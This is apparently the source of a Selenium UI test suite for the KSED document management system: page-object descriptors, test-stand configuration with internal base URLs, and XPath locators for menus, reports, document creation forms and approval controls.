internalRegJournal = PageElement(xpath=KSEDLocators.internalRegJournal) # Отчет "Журнал регистрации служебных записок"
stat_specDoc = PageElement(xpath=KSEDLocators.stat_specDoc)
stat_temDoc = PageElement(xpath=KSEDLocators.stat_temDoc)
edsBySubjectStat = PageElement(xpath=KSEDLocators.edsBySubjectStat) # Отчет "Сводка по тематикам документов"
stat_temDocO = PageElement(xpath=KSEDLocators.stat_temDocO)
edsBySubjectStatO = PageElement(xpath=KSEDLocators.edsBySubjectStatO) # Отчет "Сводка по тематикам документов(объед)"
stat_tipDoc = PageElement(xpath=KSEDLocators.stat_tipDoc)
edByTypeStat = PageElement(xpath=KSEDLocators.edByTypeStat) # Отчет "Сводка по типам документов"
allu_ispIncDoc = PageElement(xpath=KSEDLocators.allu_ispIncDoc)
allu_raspDoc = PageElement(xpath=KSEDLocators.allu_raspDoc)
allu_sluDoc = PageElement(xpath=KSEDLocators.allu_sluDoc)
allu_ispDis = PageElement(xpath=KSEDLocators.allu_ispDis)
allu_ispDispA = PageElement(xpath=KSEDLocators.allu_ispDispA)
allu_NispDI = PageElement(xpath=KSEDLocators.allu_NispDI)
allu_NispDIrg = PageElement(xpath=KSEDLocators.allu_NispDIrg)
allu_istS = PageElement(xpath=KSEDLocators.allu_istS)
allu_narS = PageElement(xpath=KSEDLocators.allu_narS)
allu_prodIsp = PageElement(xpath=KSEDLocators.allu_prodIsp)
allu_prodPodr = PageElement(xpath=KSEDLocators.allu_prodPodr)
allu_ReesContr = PageElement(xpath=KSEDLocators.allu_ReesContr)
allu_ReesContrN = PageElement(xpath=KSEDLocators.allu_ReesContrN)
allu_ReesContrF = PageElement(xpath=KSEDLocators.allu_ReesContrF)
allu_SostIspR = PageElement(xpath=KSEDLocators.allu_SostIspR)
# *******РАБОТА С ДОКУМЕНТАМИ*******
# ОБЩИЕ АТРИБУТЫ
#(форма создания документа)
title = PageElement(name=KSEDLocators.title) # Заголовок
category_doc = PageElement(xpath=KSEDLocators.category_doc) # Категория документа
doc_type = PageElement(xpath=KSEDLocators.doc_type) # Вид документа(кнопка выбора)
doc_typeInp = PageElement(xpath=KSEDLocators.doc_typeInp) # Вид документа(поле ввода)
btnOKDT = PageElement(xpath=KSEDLocators.btnOKDT) # Вид документа (кнопка "ОК")
podpisant = PageElement(xpath=KSEDLocators.podpisant) # Подписант(ы)
sposob_dost = PageElement(xpath=KSEDLocators.sposob_dost) # Способ доставки
btnCreateDoc = PageElement(xpath=KSEDLocators.btnCreateDoc) # Кнопка "Создать"
adresat = PageElement(xpath=KSEDLocators.adresat) # Адресат
korrespondent = PageElement(xpath=KSEDLocators.korrespondent) # Корреспондент
# (карточка документа)
attachments = PageElement(xpath=KSEDLocators.attachments) # # Переход во вкладку "Вложения"
vlozheniya = PageElement(xpath=KSEDLocators.vlozheniya) # Вложения (раскрытие раздела)
osnSvedeniya = PageElement(xpath=KSEDLocators.osnSvedeniya) # Основные сведения (раскрытие раздела)
printForm = PageElement(xpath=KSEDLocators.printForm)# Печатные формы (раскрытие раздела)
printBarCode = PageElement(xpath=KSEDLocators.printBarCode) #Печатная форма штрих кода документа
btnPrintInPrintForm = PageElement(id_=KSEDLocators.btnPrintInPrintForm)# Кнопка печати в окне печатной формы
btnOKpodpis = PageElement(xpath=KSEDLocators.btnOKpodpis) # Кнопка ОК подтверждение подписания
mode = PageElement(xpath=KSEDLocators.mode) # Переключение в двупанельный вид
fileUpload = PageElement(xpath=KSEDLocators.fileUpload) # Загрузить файл
fileUpload2 = PageElement(xpath=KSEDLocators.fileUpload2) # Загрузить файл в поручении
fileUpload3 = PageElement(xpath=KSEDLocators.fileUpload3) # Загрузить файл в поручении
files = PageElement(xpath=KSEDLocators.files) # Выберите файлы
show = PageElement(xpath=KSEDLocators.show) # Показать общую карточка
show_list = PageElement(xpath=KSEDLocators.show_list)# Показать ввиде списка
dropBtn = PageElement(xpath=KSEDLocators.dropBtn) # Кнопка выпадающего списка
resultSogl = PageElement(xpath=KSEDLocators.resultSogl) # результат согласования
btnPrint = PageElement(xpath=KSEDLocators.btnPrint) # Кнопка печати в форме предварительного просмотра вложения
soglasovanieWkladka = PageElement(xpath=KSEDLocators.soglasovanieWkladka) # Вкладка "Согласование"
soglasovanieWkladka2 = PageElement(xpath=KSEDLocators.soglasovanieWkladka2) # Вкладка "Согласование"
createRuleBtn = PageElement(xpath=KSEDLocators.createRuleBtn) # Кнопка "Создать маршрут"
createRuleIndivid = PageElement(xpath=KSEDLocators.createRuleIndivid) # "Индивидуальный маршрут"
addEtap = PageElement(xpath=KSEDLocators.addEtap) # Кнопка "Добавить этап"
tipeEtap = PageElement(xpath=KSEDLocators.tipeEtap) # "Вид этапа"
soglasuychie = PageElement(xpath=KSEDLocators.soglasuychie) # "Согласующие"
btnOKformSogl = PageElement(xpath=KSEDLocators.btnOKformSogl) # Кнопка "ОК" на форме добавления этапа согласования
btnTree = PageElement(xpath=KSEDLocators.btnTree) # Кнопка ...
btnSelection3 = PageElement(xpath=KSEDLocators.btnSelection3) # 3 выбор
punkti = PageElement(xpath=KSEDLocators.punkti) # Вкладка "Пункты"
punktiBtn = PageElement(xpath=KSEDLocators.punktiBtn) # Кнопка "Пункты"
punktPoruch = PageElement(xpath=KSEDLocators.punktPoruch) # Пункт/Поручение
textPoruch = PageElement(xpath=KSEDLocators.textPoruch) # Текст поручения
tipPoruch = PageElement(xpath=KSEDLocators.tipPoruch) # Тип поручения
otvetstv_ispolnVpunktah = PageElement(xpath=KSEDLocators.otvetstv_ispolnVpunktah) # Ответственный исполнитель в пунктах карточки документа
srokIspoln = PageElement(xpath=KSEDLocators.srokIspoln) # Срок исполнения (среднее знач)
btnOKform = PageElement(xpath=KSEDLocators.btnOKform) # Кнопка ОК на форме
sendFor_approval = PageElement(xpath=KSEDLocators.sendFor_approval) # Действие "Направить на согласование"
sendFor_podpis = PageElement(xpath=KSEDLocators.sendFor_podpis) # Действие "Направить на подписание"
sendFor_execution = PageElement(xpath=KSEDLocators.sendFor_execution) # Действие "Направить на исполнение"
btnOKnaprNaIspoln = PageElement(xpath=KSEDLocators.btnOKnaprNaIspoln) # Кнопка "ОК" на форме подтверждения действия "Направить на исполнение"
confirm = PageElement(xpath=KSEDLocators.confirm) # Подтверждение согласования
confirm2 = PageElement(xpath=KSEDLocators.confirm2) # Подтверждение согласования
confirm_3 = PageElement(xpath=KSEDLocators.confirm_3) # Подтверждение согласования
confirm_4 = PageElement(xpath=KSEDLocators.confirm_4) # Подтверждение согласования
confirm_5 = PageElement(xpath=KSEDLocators.confirm_5) # Подтверждения выбора
status_Doc = PageElement(xpath=KSEDLocators.status_Doc) # Статус документа во вкладке (Основные сведения)
#"Отправить отчет"
actionSendAllere = PageElement(xpath=KSEDLocators.actionSendAllere) # "Отправить отчет" действие
btnSend = PageElement(xpath=KSEDLocators.btnSend) # Кнопка "Отправить"
textAllur = PageElement(xpath=KSEDLocators.textAllur) # Текстовое поле "Текст отчета"
btnAddSvyz = PageElement(xpath=KSEDLocators.btnAddSvyz) # Кнопка добавления связи "..."
searchDoc = PageElement(xpath=KSEDLocators.searchDoc) # Строка поиска в форме подбора
oneListEl = PageElement(xpath=KSEDLocators.oneListEl) # Первый элемент в списке справочника
btnOK = PageElement(xpath=KSEDLocators.btnOK) # Кнопка "ОК" в форме подбора
# (панель согласования)
APPROVED_button = PageElement(xpath=KSEDLocators.APPROVED_button) # Кнопка "Согласовать"
APPROVED_WITH_REMARK_button = PageElement(xpath=KSEDLocators.APPROVED_WITH_REMARK_button) # Кнопка "Согласовать с комментариями"
REJECTED_button = PageElement(xpath=KSEDLocators.REJECTED_button) # Кнопка "Отклонить"
internal_approval = PageElement(xpath=KSEDLocators.internal_approval) # Кнопка "Внутреннее согласование"
prop_bpm_comment = PageElement(name=KSEDLocators.prop_bpm_comment) # Поле комментария
# Page-element descriptors bound to locator strings from KSEDLocators
# (class body continues from above; each attribute wraps one UI control).
apply_button_button = PageElement(xpath=KSEDLocators.apply_button_button) # "OK" button when submitting an approval decision
apply_button_button2 = PageElement(xpath=KSEDLocators.apply_button_button2) # "OK" button when submitting an approval decision
SIGNED_button = PageElement(xpath=KSEDLocators.SIGNED_button) # "Sign" button
# # PROTOCOL (MINUTES)
# # (document creation form)
# addEl = PageElement(xpath=KSEDLocators.addEl) # Document kind (working-group meeting minutes)
# addEl2 = PageElement(xpath=KSEDLocators.addEl2) # Document kind "Internal memo"
# DIRECTIVE DOCUMENT (RD)
# (document creation form)
addEl = PageElement(xpath=KSEDLocators.addEl) # Document kind (working-group meeting minutes)
addEl2 = PageElement(xpath=KSEDLocators.addEl2) # Document kind "Internal memo"
preambula = PageElement(xpath=KSEDLocators.preambula) # Preamble
obcontrol = PageElement(xpath=KSEDLocators.obcontrol) # Overall control
wid_doc = PageElement(xpath=KSEDLocators.wid_doc) # Document kind (inside an RD)
wid_doc_rasp = PageElement(xpath=KSEDLocators.wid_doc_rasp) # RD document kind (Order)
addPunkt = PageElement(xpath=KSEDLocators.addPunkt) # "Add item" button
textPunktaRD = PageElement(name=KSEDLocators.textPunktaRD) # RD item text
otvetstv_ispolnVpunktahRD = PageElement(xpath=KSEDLocators.otvetstv_ispolnVpunktahRD) # Responsible executor in an RD item
rassilka = PageElement(xpath=KSEDLocators.rassilka) # "Distribution" tab
btnVipolnit = PageElement(xpath=KSEDLocators.btnVipolnit) # "Execute..." button
punktBtnVipolnit = PageElement(xpath=KSEDLocators.punktBtnVipolnit) # "Create and fill in" item
# PROTOCOL (MINUTES)
# (document creation form)
date = PageElement(xpath=KSEDLocators.date) # Meeting date
category = PageElement(xpath=KSEDLocators.category) # Category
Chairman = PageElement(xpath=KSEDLocators.Chairman) # Chairman
Secretary = PageElement(xpath=KSEDLocators.Secretary) # Secretary
person_present = PageElement(xpath=KSEDLocators.person_present) # Attendees
# REGISTRY
# (document creation form)
vid_reestra = PageElement(xpath=KSEDLocators.vid_reestra) # Registry kind
vid_reestraPR = PageElement(xpath=KSEDLocators.vid_reestraPR) # Registry kind (Transfer for registration)
vid_reestraPP = PageElement(xpath=KSEDLocators.vid_reestraPP) # Registry kind (Acceptance/transfer)
btnCreateChern = PageElement(xpath=KSEDLocators.btnCreateChern) # "Create draft" button
btnCreateSend = PageElement(xpath=KSEDLocators.btnCreateSend) # "Create and send" button
inpDoc = PageElement(xpath=KSEDLocators.inpDoc) # "Documents" field
poluchatel = PageElement(xpath=KSEDLocators.poluchatel) # "Recipient" field
# INTERNAL MEMO
# (document creation form)
adresati = PageElement(xpath=KSEDLocators.adresati) # Addressees
podpisanti = PageElement(xpath=KSEDLocators.podpisanti) # Signers
# ARBITRARY DOCUMENT
# (document creation form)
prorabotka = PageElement(xpath=KSEDLocators.prorabotka) # Elaboration
chBprorab = PageElement(xpath=KSEDLocators.chBprorab) # Elaboration checkbox
normokontrol = PageElement(xpath=KSEDLocators.normokontrol) # Standards control
chBnorm = PageElement(xpath=KSEDLocators.chBnorm) # Standards-control checkbox
soglasovanie = PageElement(xpath=KSEDLocators.soglasovanie) # Approval
podpisanie = PageElement(xpath=KSEDLocators.podpisanie) # Signing
utverzhdenie = PageElement(xpath=KSEDLocators.utverzhdenie) # Ratification
oznakomlenie = PageElement(xpath=KSEDLocators.oznakomlenie) # Acknowledgement
# ERRAND
# (document creation form)
tipPoruch = PageElement(xpath=KSEDLocators.tipPoruch) # Errand type
text_poruch = PageElement(name=KSEDLocators.text_poruch) # Errand text
otvetstv_ispoln = PageElement(xpath=KSEDLocators.otvetstv_ispoln) # Responsible executor
# INCOMING CORRESPONDENCE PACKAGE
# INCOMING DOCUMENT
# (document creation form)
ishNumber = PageElement(name=KSEDLocators.ishNumber) # Outgoing number (of the sender)
dateIS = PageElement(xpath=KSEDLocators.dateIS) # Outgoing date
# OUTGOING DOCUMENT
# (document creation form)
osnovPodpis = PageElement(name=KSEDLocators.osnovPodpis) # Signing basis
korrespondentISH = PageElement(xpath=KSEDLocators.korrespondentISH) # Correspondent
clickNull = PageElement(xpath=KSEDLocators.clickNull) # Click outside any attribute (drops focus)
# Report forms
# My search queries
listChange = PageElement(xpath=KSEDLocators.listChange) # Drop-down list
listChangeSZ = PageElement(xpath=KSEDLocators.listChangeSZ) # Drop-down list - internal memo
listChangeRD = PageElement(xpath=KSEDLocators.listChangeRD) # Drop-down list - RD
butSave = PageElement(xpath=KSEDLocators.butSave) # "Save" button
nameZap = PageElement(xpath=KSEDLocators.nameZap) # Query name
zaprosToDel = PageElement(xpath=KSEDLocators.zaprosToDel) # The created query
butDel = PageElement(xpath=KSEDLocators.butDel) # "Delete" button
butRed = PageElement(xpath=KSEDLocators.butRed) # "Edit" button
butDelAc = PageElement(xpath=KSEDLocators.butDelAc) # Delete confirmation button
butAct = PageElement(xpath=KSEDLocators.butAct) # "Actions with selected" button
butAct_2 = PageElement(xpath=KSEDLocators.butAct_2) # "Actions with selected" button
butExp = PageElement(xpath=KSEDLocators.butExp) # Export button
butExp_2 = PageElement(xpath=KSEDLocators.butExp_2) # Export button
checkBoxFirst = PageElement(xpath=KSEDLocators.checkBoxFirst) # First checkbox in the list
butFavorite = PageElement(xpath=KSEDLocators.butFavorite) # "Add to favorites" button
butOK = PageElement(xpath=KSEDLocators.butOK) # "OK" button (add to favorites)
butSelExp = PageElement(xpath=KSEDLocators.butSelExp) # Export-selected button
--- FILE SEPARATOR ---
class dataTest:
    """Static test-environment configuration for the KSED suite.

    Note: callers reference this class by name, so the (non-PEP8) name is
    kept for backward compatibility.
    """

    # Base URL of the stand under test. Alternate stands, switch by editing:
    #   http://172.30.48.50:8080/share/page/arm?code=SED
    #   http://172.30.48.48:8080/share/page/arm?code=SED
    #   http://172.30.48.49:8080/share/page/arm?code=SED
    #   http://172.30.48.41:8000/share/page/arm?code=SED
    baseURL = 'http://172.30.48.40:8080/share/page/arm?code=SED'

    # Barcode of an existing document, used by tests that need to find and
    # attach a document (e.g. when creating a registry). Previously: 469958.
    BARCODE = '5387445'
--- FILE SEPARATOR ---
# Extraction of the document number from a file (helpers below are currently disabled)
# def rFile():
#
# my_file = open("D:\PyTestKSED\KSED\TestData\linkDoc.txt", "r")
# my_string = my_file.read()
# my_string.strip()
# return my_string
# my_file.close()
#
# def rFileRD():
#
# my_file = open("D:\PyTestKSED\KSED\TestData\linkDocRD.txt", "r")
# my_string = my_file.read()
# my_string.strip()
# return my_string
# my_file.close()
# #
# # my_file = open("tempDoc.txt")
# # my_string = my_file.read()
# # my_string.strip()
# #
# # locator = str("'//a[text() = ") + '"' + str(my_string) + '"]' + "'"
# # return (locator)
# #
# # my_file.close()
#
#
class KSEDLocators:
    """Locator constants for the KSED UI autotests.

    Each attribute is a raw locator string; the trailing comment names the
    locator strategy (xpath / id / name) and the UI element it targets.
    The strings are consumed verbatim by the page objects, so they must not
    be reformatted.
    """
    #
    # # Document link (built from a file by the helpers commented out above)
    # LinkDoc = rFile()
    # LinkDocRD = rFileRD()
    # Login form
    username_text = 'username' # name
    password_text = 'password' # name
    LogIn_button = '//span/button' # xpath
    # ******* MENU BAR *******
    ksed = '(//a[contains(@title, "КСЭД")])[1]' #xpath # KSED
    barcode_search = 'SEARCH_BARCODE_text' #id # Search by barcode
    search_bc = '//input[contains(@id, "search_bc")]' #xpath # Barcode search input
    more_menu = 'LOGIC_ECM_MORE_MENU_BAR' #id # "More" menu
    ksed_in_more_m = 'SED_MENU_ITEM_ADDITIONAL_text' #id # KSED inside the "More" menu
    Company_dir = '//a[contains(@title, "Справочник организации")]' #xpath # Organization directory
    admin = '//a[contains(@title, "Администрирование")]' #xpath # Administration
    transfer = '//a[contains(@title, "Передача дел")]' #xpath # Case transfer
    arm_arh = '//a[contains(@title, "Передача дел")]' #xpath # Archive workstation. NOTE(review): identical to `transfer` — looks like a copy-paste; confirm
    verify = '//a[contains(@title, "Верификация")]' #xpath # Verification
    scanner = '//a[contains(@title, "Верификация")]' #xpath # Barcode scanner. NOTE(review): identical to `verify` — confirm
    notification = 'NOTIFICATIONS_text' #id # Notifications
    notificationProtokol = '(//a[contains(text(), "Протокол:")])[1]' #xpath # First protocol notification in the list
    notificationFirst = '(//span[@class = "detail"]/a)[1]' #xpath # First notification in the list (was mislabelled "#id")
    # ******* USER MENU *******
    user_menu = '//span[@id="HEADER_USER_MENU_POPUP_text"]' #xpath # User menu
    USER_LOGOUT = '//td[@id="HEADER_USER_MENU_LOGOUT_text"]' #xpath # Log out of the system
    my_profile = '//a[text() = "Мой профиль"]' # xpath # "My profile" menu item
    fieldlabel = '//div[@class = "fieldlabel"]' #xpath # Job title in the summary info area
    btnEdit_profile = '//button[contains(@id, "button-edit-button")]' #xpath # "Edit profile" button
    inputPosition = '//input[contains(@id, "-input-jobtitle")]' #xpath # Job title input
    logic_ESM = '//a[text() = "Логика ECM. Мой профиль"]' # xpath # "Logika ECM. My profile" menu item
    autoAnswerText = 'prop_lecm-absence_auto-answer-text' #name # Auto-reply text ("I am out of the office")
    btnCancelAbsence = '//button[contains(@id, "cancelButton-button")]' #xpath # "Cancel absence" button
    btnYes = '//button[text() = "Да"]' #xpath # "Yes" button (cancel absence)
    edit_password = '//a[text() = "Изменить пароль"]' #xpath # "Change password" menu item
    inputOldPassword = '//input[contains(@id, "oldpassword")]' #xpath # Old password input
    inputNewPassword1 = '//input[contains(@id, "newpassword1")]' # xpath # New password input (comment was a copy-paste of "old password")
    inputNewPassword2 = '//input[contains(@id, "newpassword2")]' # xpath # New password confirmation input
    btnOKchange = '//button[contains(@id, "_default-bu")][text() = "ОК"]' #xpath # "Change password" button
    # ******* LEFT SIDE OF THE PAGE ("Create" button and sections) *******
    newDoc_button = '//button[contains(@id, "newDocumentButton-button")]' #xpath # "Create"
    protocol = '//a[contains(@class, "hassubmenu")][contains(text(), "Протокол")]' #xpath # Protocol (minutes)
    rd = '//a[contains(@class, "hassubmenu")][contains(text(), "Распорядительный документ")]' #xpath # Directive document (RD)
    reestr = '//a[contains(text(), "Реестр")]' #xpath # Registry
    poruchenie = '//a[contains(text(), "Поручение")]' #xpath # Errand
    cardSogl = '//a[contains(text(), "Карточка согласования")]' # xpath # Approval card
    resolution = '//a[contains(@class, "hassubmenu")][contains(text(), "Резолюция")]' #xpath # Resolution
    SZ = '//a[contains(@class, "hassubmenu")][contains(text(), "Служебная записка")]' #xpath # Internal memo
    proizvDoc = '//a[contains(@class, "yuimenuitemlabel")][contains(text(), "Произвольный документ")]' # xpath # Arbitrary document
    paket_vh = '//a[contains(@class, "yuimenuitemlabel")][contains(text(), "Пакет входящей корреспонденции")]' #xpath # Incoming correspondence package
    vhDoc = '//a[contains(@class, "yuimenuitemlabel")][contains(text(), "Входящий документ")]' # xpath # Incoming document
    ishDoc = '//a[contains(@class, "yuimenuitemlabel")][contains(text(), "Исходящий документ")]' # xpath # Outgoing document
    # SECTIONS
    myWork = '//div[contains(text(), "Моя работа")]' #xpath # My work
    expedition = '//div[contains(text(), "Экспедиция")]' #xpath # Expedition
    navigation = '//div[contains(text(), "Навигатор")]' #xpath # Navigator
    allur = '//div[contains(text(), "Отчеты")]' #xpath # Reports
    workReg = '//div[contains(text(), "Работа регистратора")]' #xpath # Registrar's work
    medo = '//div[contains(text(), "МЭДО")]' #xpath # MEDO
    mySearch = '//div[contains(text(), "Мои поисковые запросы")]' #xpath # My search queries
    poiskzapr = '//span[text() = "Поисковые запросы"]' #xpath # Search queries
    myPoiskZapr = '//td[contains(@id, "ygtvcontente")]/span[text() = "2"]' #xpath # Search queries (tree node)
    ControlZapr = '//span[text() = "Управление поисковыми запросами"]' #xpath # Search query management
    btnPlus = '(//a[@class = "ygtvspacer"])[14]' # xpath # Expand button in my queries
    # VIEW AREA (KSED)
    oblProsm = '(//div[contains(@id, "_default-body")][contains(@class, "datagrid")])[2]' #xpath # View area
    full_text_search = '(//input[contains(@id, "_default-full-text-search")])[1]' #xpath # Search input
    oneDocInList = '(//a[contains(@href, "document?nodeRef=workspace")])[1]' #xpath # First document in the list
    nineDocInList = '(//a[contains(@href, "document?nodeRef=workspace")])[9]' # xpath # Ninth document in the list
    subordinate = '//span[@class = "expand-table-icon"]' #xpath # "+" that expands subordinate documents
    oneSubordInList = '(//a[contains(@href, "document?nodeRef=workspace")]' \
                      '[not(contains(@href, "/d"))])[1]' #xpath # First link to a subordinate document
    ActionTab = '//span[contains(@class, "group-actions-counter")]' #xpath # "Actions with selected" button
    chBinOnl = '//input[contains(@id, "_default-select-all-records")]' # xpath # select-all checkbox; alt: '//input[@name = "fileChecked"][3]'
    # My work
    WorkImmid = '//span[text() = "Срочные"]' #xpath # "Urgent" section
    connectedDoc = '(//h2[contains(@id, "alf-")])[6]' #xpath # Related documents
    # REPORTS
    section_allur = '//div[contains(@id, "ac-head")][contains(text(), "Отчеты")]' #xpath # "Reports" section
    node_Logs = '//span[contains(text(), "Журналы")]' #xpath # "Journals"
    node_Statis = '//span[contains(@class, "ygtvlabel")][contains(text(), "Статистические")]' #xpath # "Statistical" reports
    # (a duplicate `edsBykindStat` assignment used to sit here; the identical
    # value is defined once below, next to `stat_specDoc`)
    node_ispDisp = '//div[contains(@class, "shown")]//span[contains(text(), "Отчеты по исполнительской дисциплине")]' #xpath # Performance-discipline reports node; alt: '//span[contains(text(), "Отчеты по исполнительской дисциплине")]'
    logs_incDoc = '//a[contains(text(), "Журнал регистрации входящих документов")]' #xpath # "Incoming documents registration journal"
    incomingRegJournal = '//a[contains(@onclick, "incoming-reg-journal")]' #xpath # Report "Incoming documents registration journal"
    logs_outDoc = '//a[contains(text(), "Журнал регистрации исходящих документов")]' #xpath # "Outgoing documents registration journal"
    outgoingRegistration = '//a[contains(@onclick, "outgoing-registration")]' # xpath # Report "Outgoing documents registration journal"
    logs_raspDoc = '//a[contains(text(), "Журнал регистрации Распорядительных документов")]' #xpath # "Directive documents registration journal"
    ordRegJournal = '//a[contains(@onclick, "ord-reg-journal")]' # xpath # Report "Directive documents registration journal"
    logs_sluDoc = '//a[contains(text(), "Журнал Регистрации служебных записок")]' #xpath # "Internal memos registration journal"
    internalRegJournal = '//a[contains(@onclick, "internal-reg-journal")]' # xpath # Report "Internal memos registration journal"
    stat_specDoc = '//a[contains(text(), "Сводка по видам документов")]' #xpath # "Summary by document kinds"
    edsBykindStat = '//a[contains(@onclick, "eds-by-kind-stat")]' # xpath # Report "Summary by document kinds"
    stat_temDoc = '//a[contains(text(), "Сводка по тематикам документов")]' #xpath # "Summary by document subjects"
    edsBySubjectStat = '(//a[contains(@onclick, "eds-by-subject-stat")])[1]' #xpath # Report "Summary by document subjects"
    stat_temDocO = '//a[contains(text(), "Сводка по тематикам документов (объедин.)")]' #xpath # "Summary by document subjects (combined)"
    edsBySubjectStatO = '(//a[contains(@onclick, "eds-by-subject-stat")])[2]' # xpath # Report "Summary by document subjects (combined)"
    stat_tipDoc = '//a[contains(text(), "Сводка по типам документов")]' #xpath # "Summary by document types"
    edByTypeStat = '//a[contains(@onclick, "eds-by-type-stat")]' #xpath # Report "Summary by document types"
    allu_ispIncDoc = '//a[contains(text(), "Исполнение входящих документов")]' #xpath # "Execution of incoming documents"
    allu_raspDoc = '//a[contains(text(), "Исполнение распорядительного документа")]' #xpath # "Execution of a directive document"
    allu_sluDoc = '//a[contains(text(), "Исполнение служебных записок")]' #xpath # "Execution of internal memos"
    allu_ispDis = '//a[contains(text(), "Исполнительская дисциплина по авторам")]' #xpath # "Performance discipline by authors"
    allu_ispDispA = '//a[contains(text(), "Исполнительская дисциплина по исполнителям")]' #xpath # "Performance discipline by executors"
    allu_NispDI = '(//a[contains(text(), "Неисполненные поручения с истекшим сроком")])[1]' #xpath # "Unfulfilled errands with expired deadline"
    allu_NispDIrg = '//a[contains(text(), "Неисполнительные поручения с истекшим сроком РГ")]' #xpath # "Unfulfilled WG errands with expired deadline"
    allu_istS = '//a[contains(text(), "Поручения с истекающим сроком")]' #xpath # "Errands with expiring deadline"
    allu_narS = '//a[contains(text(), "Поручения, исполненные с нарушением срока")]' #xpath # "Errands fulfilled past the deadline"
    allu_prodIsp = '//a[contains(text(), "Продуктивность по Исполнителям")]' #xpath # "Productivity by executors"
    allu_prodPodr = '//a[contains(text(), "Продуктивность по Подразделениям")]' #xpath # "Productivity by departments"
    allu_ReesContr = '//a[contains(text(), "Реестр для закрытия неактуальных контрольных поручений")]' #xpath # "Registry for closing outdated control errands"
    allu_ReesContrN = '//a[contains(text(), "Реестр неисполнительных контрольных поручений")]' #xpath # "Registry of unfulfilled control errands"
    allu_ReesContrF = '//a[contains(text(), "Реестр фактически исполненных контрольных поручений")]' #xpath # "Registry of actually fulfilled control errands"
    allu_SostIspR = '//a[contains(text(), "Состояние исполнения резолюций")]' #xpath # "State of execution of resolutions"
    # ******* WORKING WITH A DOCUMENT *******
    # COMMON ATTRIBUTES
    # (document creation form)
    title = 'prop_lecm-document_title' # name # Title
    category_doc = '//input[contains(@id, "-category-assoc-cntrl-autocomplete-input")]' # xpath # Document category
    doc_type = '//button[contains(@id, "type-assoc-cntrl-tree-picker-button-button")]' #xpath # Document kind (picker button)
    doc_typeInp = '//input[contains(@id, "type-assoc-cntrl-autocomplete-input")]' #xpath # Document kind (input field)
    btnOKDT = '//button[contains(@id, "type-assoc-cntrl-ok-button")]' # xpath # Document kind ("OK" button)
    podpisant = '//input[contains(@id, "signerEmployeeAssoc-cntrl-autocomplete-input")]' # xpath # Signer(s)
    sposob_dost = '//input[contains(@id, "_delivery-method-assoc-cntrl-autocomplete-input")]' # xpath # Delivery method
    btnCreateDoc = '//button[contains(@id, "_default-form-submit-button")]' # xpath # "Create" button
    adresat = '//input[contains(@id, "_recipient-assoc-autocomplete")]' # xpath # Addressee
    korrespondent = '//input[contains(@id, "sender-assoc-autocomplete")]' # xpath # Correspondent
    # (document card)
    attachments = '//span[contains(@id, "action-expand")][contains(@class, "attachments-expand")]' #xpath # Switch to the "Attachments" tab
    vlozheniya = '//h2[contains(@id, "heading")][contains(text(), "Вложения")]' # xpath # Attachments (expand the section)
    remarks = '//h2[contains(string(), "Замечания и внутреннее согласование")]' # xpath # Remarks and internal approval
    remarksBtn = '//span[contains(@id, "yui")][contains(@class, "rn-approval-dashlet-expand")]' # xpath # Expand the remarks dashlet
    osnSvedeniya = '//h2[contains(@id, "heading")][contains(text(), "Основные сведения")]' #xpath # General info (expand the section)
    printForm = '//h2[contains(@id, "heading")][contains(text(), "Печатные формы")]' #xpath # Print forms (expand the section)
    printBarCode = '//a[contains(text(), "Штрих-код документа")]' #xpath # Document-barcode print form
    btnPrintInPrintForm = 'print' #id # Print button in the print-form window
    mode = '//button[contains(@id, "default-cntrl-split-panel-button-button")]' #xpath # Split-panel mode button
    fileUpload = '(//button[contains(@id, "fileUpload-button-button")])[2]' #xpath # Upload file
    fileUpload2 = '//button[contains(@id, "fileUpload-button-button")]' # xpath # Upload file (in an errand)
    fileUpload3 = '//button[contains(@class, "file-selection-button")]' #xpath # Choose file
    fileUpload4 = '(//button[contains(@id, "-upload-button-button")])[1]' #xpath # Upload file
    files = '//input[@type="file"][@name="files[]"]' #xpath # Choose files
    show = '//a[contains(@id, "action-show-main")]' #xpath # Show the general card
    show_list = '//a[@class = "preview-show-list"]' #xpath # Show as a list
    btnPrint = '//button[contains(@id, "print_from_preview")]' #xpath # Print button in the attachment preview
    btnOKpodpis = '(//button[text() = "ОК"])[1]' #xpath # "OK" confirming signing; alt: (//em[text() = "Согласование"])[2]
    dropBtn = '(//span[contains(@class, "expand-table-icon")])[2]' #xpath # Expand drop-down list button
    dropBtn_2 = '(//span[contains(@class, "expand-table-icon")])[1]' #xpath # Expand drop-down list button
    # dropBtn_2 = '(//a[contains(@title, "Раскрыть все этапы")])[1]' #xpath # Expand drop-down list button (old variant)
    resultSogl = '//td[contains(@class, "StageItemStatus")]' # xpath # Approval result
    soglasovanieWkladka = '//em[contains(text(), "Согласование")]' # xpath # "Approval" tab
    soglasovanieWkladka2 = '(// em[text() = "Согласование"])[2]' # xpath # "Approval" tab
    createRuleBtn = '//button[contains(@id, "create-approval-list-button-button")]' # xpath # "Create route" button
    createRuleIndivid = '//a[text() = "Индивидуальный маршрут"]' #xpath # "Individual route"; alt: (//a[text() = "Типовой"])[1]
    createRuleTypical = '(//a[text() = "Типовой"])[1]' #xpath # "Typical route"
    addEtap = '//button[contains(@id, "cntrl-add-stage-button")]' #xpath # "Add stage" button
    tipeEtap = '//input[contains(@id, "type-cntrl-autocomplete-input")]' #xpath # "Stage kind"
    soglasuychie = '//input[contains(@id, "approvers-autocomplete")]' #xpath # "Approvers"
    btnOKformSogl = '//button[contains(@id, "form-submit-button")]' #xpath # "OK" on the add-approval-stage form
    btnTree = '//span[contains(@class, "-push-button")][contains(@id, "type-cntrl-tree-picker-button")]' #xpath # "..." button
    btnSelection_1 = '(//span[contains(@class, "addIcon")])[1]' # xpath # "+" button, first pick
    btnSelection1 = '(//i[contains(@class, "icon-plus")])[1]' # xpath # "+" button, first pick
    btnSelection3 = '(//span[contains(@class, "addIcon")])[3]' # xpath # "+" button, third pick
    btnSelection_3 = '(//i[contains(@class, "icon-plus")])[3]' # xpath # "+" button, third pick
    btnSelection_4 = '(//span[contains(@class, "addIcon")][contains(@id, "yui-gen")])[7]' # xpath # "+" button, fourth pick
    btnSelection_5 = '(//span[contains(@class, "addIcon")])[5]' # xpath # "+" button, fifth pick
    punkti = '//em[contains(text(), "Пункты")]' #xpath # "Items" tab
    punktiBtn = '//button[contains(@id, "create-point-button")]' #xpath # "Items" button
    punktPoruch = '(//a[contains(@class, "yuimenuitemlabel")][contains(text(), "Поручение")])[1]' #xpath # Item / Errand
    textPoruch = '//textarea[contains(@id, "ts_point-desc")]' #xpath # Errand text
